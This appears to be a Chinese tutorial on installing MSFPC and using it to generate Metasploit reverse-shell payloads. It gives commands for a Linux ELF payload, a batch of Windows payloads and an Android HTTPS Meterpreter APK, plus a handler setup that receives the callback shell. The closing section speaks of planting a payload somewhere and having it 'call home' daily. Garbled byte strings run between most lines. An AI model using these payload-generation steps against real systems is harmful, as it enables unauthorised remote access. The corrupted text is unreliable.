|
|
一般来说,生成payload的默认工具是MSFvenom,这是一个独立于Metasploit的payload生成器及编码器。虽然它是一个非常强大的payload生成神器,但是对于一些新手来说,可能难以在短时间内熟悉其操作。即使在进行最初的了解之后,生成一个基本的payload也需要输入相当多的内容,而今天,我们将看到使用MSFPC更便捷地生成paylaod。 >pfeP"[�(3 MSFPC,或者说是MSFvenom Payload生成器,其实是一个基于MSFvenom的Payload生成器,但是它旨在简化基本的有效载荷创建过程,用户使用MSFPC可以尽可能简单地创建Payload,有时甚至只需要一个参数!如果你以前使用过MSFvenom,那么可能已经自行编写了一个简单的shell脚本来自动化频繁地生成Payload。即使这样,这个工具也绝对值得一试。 ~��h�3G}EH 第一步:安装MSFPC [cd1M�f:[Y 首先,我们需要先行安装MSFPC,步骤会因为操作系统的差别而有所不同。 �Z5 IW�oY� 第一种:在Kali Linux上安装 }OAU�5P!rp 如果你想要在Kali Linux上安装MSFPC,那么可能会十分简单,因为它已经包含在了Kali工具库中。如果没有,那么就使用apt安装,如下所示: -[-oz0`Sl{ apt install msfpc 第二种:在一般的Linux上安装 y ;[~�(Yg[ 对于没有这个软件包的Linux和Unix版本,只需要在终端从github进行克隆就好了: 9hIKx:�XCg git clone https://github.com/g0tmi1k/mpc; kx;X:I(5&P cd mpc Z\�C��va�X  M<w�.q�|P� 一旦成功克隆,就可以将其复制到一个目录中了,对于脚本本身,可以选择/usr/bin。 S"h;u�=5it  KM?4�J6jH� 我个人不喜欢搞乱/usr/bin,把他们放在自己的目录中方便时刻跟踪我编译的或者是从github上获取的工具,当然了,这些都取决于你自己。 �Mc@9ivwL# 为所有用户安装 �ZDFq=�)0C 为了可以放在/usr/bin中,先切换到你的mpc目录,然后使用终端改变脚本权限,如下所示: �O0�qG
6�a cd /path/to/mpc //mpc的目录 �x'`{#�bKD sudo chown root:root msfpc.sh eW(pP>@k�, sudo chmod 755 msfpc.sh <x�^$�F�u� sudo cp msfpc.sh /usr/bin �fI)XV�7,X 这组命令意思是将脚本的所有者和组都更改为root,然后使用chmod命令将文件权限配置为755,最后,将脚本移动到/usr/bin中。 3s!6rT_=)d  n;Oe-�+oSC 为特定用户安装 � lrv�-[}} 要安装到主目录中的pentest文件夹,你需要打开你的终端并输入以下内容开始该过程: |�"SZp�x� mkdir ~/pentest �_:�m70%�i cd /path/to/mpc �y 9]d{:9
chmod 700 msfpc.sh J�j
\�nye+ cp msfpc.sh ~/pentest jy!]MAP#Gk 你可能已经有一个pentest目录。如果是这样的话,就没有必要再创建一个新的。 chmod命令将脚本的权限更改为RWX ——。然后我们将它复制到pentest目录中。 ES+��CAwqf  ZTzec zXpQ 这还没完,因为这个目录不是我们路径的一部分,为了解决这个问题,我们需要编辑我们主目录中的.bashrc。我一直在用Vim,当然你可以使用任何喜欢的编辑器(leafpad),你需要键入以下内容: 8/aJ4w��[A vim ~/.bashrc ;]-08lzO<4 一旦你开始编辑了,使用以下命令将pentest目录添加到路径变量中: aA|{r/.10K PATH=$PATH:/path/to/my/pentest/directory OCx�'cSs-= 你可以省略最后的斜杠。 $�k\bP9��
 g9pKoi|\E� 保存后,使用source和which命令: �F6q=�W#~ source ~/.bashrc J�=�3�{<Xl which msfpc.sh �@n)?�=�[p  L���}*o8l` 这样一来,MSFPC就完成安装了! uy<3B>3~. 生成一个Linux Payload m0bxVV^DK! 现在我们已经在自己选择的系统上安装了该工具,接下来就开始生成Payload。对于我们的第一个Payload,我们将使用msfpc.sh生成一个基本的Linux反向TCP ELF Payload。 >`x|�E-X"� 对于第一个Payload,我们只需要将一个参数传给MSFPC。 1 ��7~�Pc� msfpc.sh linux Z?o�0Q\�}1  Qf=^C�Q=lV 首先需要注意的是,我只告诉了MSFPC我想生成一个Linux Payload,没有任何其他的信息,所以MSFPC不知道我们想连接的地址,所以它提供了选项。WAN是我的外部IP,lo是本地的,ens33是我的网络接口。 �B�46:LQ9[ 我选择了2(ens33),如果你记不住你的地址,那么这种方式就可以节省你很多时间。CMD那里显示的输出是生成该Payload而执行的完整MSFvenom命令,相当详细,而且你也可以进行核对。 D�S(>R!b�b 一旦生成了Payload,就可以设置一个Metasploit handler来测试一下了,但是我也不必手动配置这个handler,因为Msfpc.sh会创建一个名字类似于Payload的文件,拓展名为rc。为了启动这个handler,我只需要将文件放到Metasploit中。 %H�G�+�|)b sudo msfconsole -q -r '/home/barrow/linux-shell-staged-reverse-tcp-443-elf.rc' e�#;43=/Ia 此命令中sudo的原因是因为我只是试图绑定到端口443的普通用户。-q参数告诉msfconsole跳过启动画面,-r告诉msfconsole加载文件。完成后,一旦执行有效载荷,就会回连给我一个反向shell。 ]��eGa_Ld�  CB#2XS��>V 生成一个Windwos Payload :���g|.x�� 对于Windows,我想创建多种不同的Payload。Msfpc.sh允许批量创建Payload,这意味着我可以为特定目标创建所有Payload,以下是命令: �6��-�wp�R msfpc.sh windows batch ens33 8`*5[ L~~/ 在这个命令中,我告诉msfpc.sh使用我的IP创建所有Payload,在生成过程中,可能会出现一些错误,但是最终还是会有一批Windows Payload文件。 }'P�|A����  �^s6~*n<fH 生成安卓Payload
(sK�g*G2 我们已经完成了Windows和Linux部分。接下来使用msfpc.sh为Android设备生成一个Payload。对于这个例子,我将生成一个Android反向TCP HTTPS MeterpreterPayload。可以用下面的命令: LG,?��,%_s msfpc.sh apk HTTPS ens33 w��MCMrv: 该命令将为Android创建一个反向TCP有效载荷,并使用我IP地址通过HTTPS进行通信。 ">�Qxb�.Y}  �gV@�xu)l� 总结 �#!Cg$6%x9 当谈到快速创建基本的Payload时,Msfpc.sh是真的不错。这个脚本的主要缺点是它只能用于生成基本的Payload。而无法生成任何经过编码的,可绕过防病毒的Payload,但这取决于你的目标。很多时候,你只需要快速创建一个Payload,把它放在某个地方,然后每天给它“打电话”。在这种情况下,msfpc.sh真的很棒。 �j�>JBZ�#g 在整篇文章中,我主要介绍了涉及了msfpc.sh的各种选项。但还有很多其他选项可用,你可以使用–help verbose,这样一来,脚本会为你提供完整的帮助文件。帮助文件非常之详细,且易于阅读。 viG=�Ap.Th WinPayloads:一款可生成难以被检测到的payload之神奇工具 AJ/Hw>>$?m
|
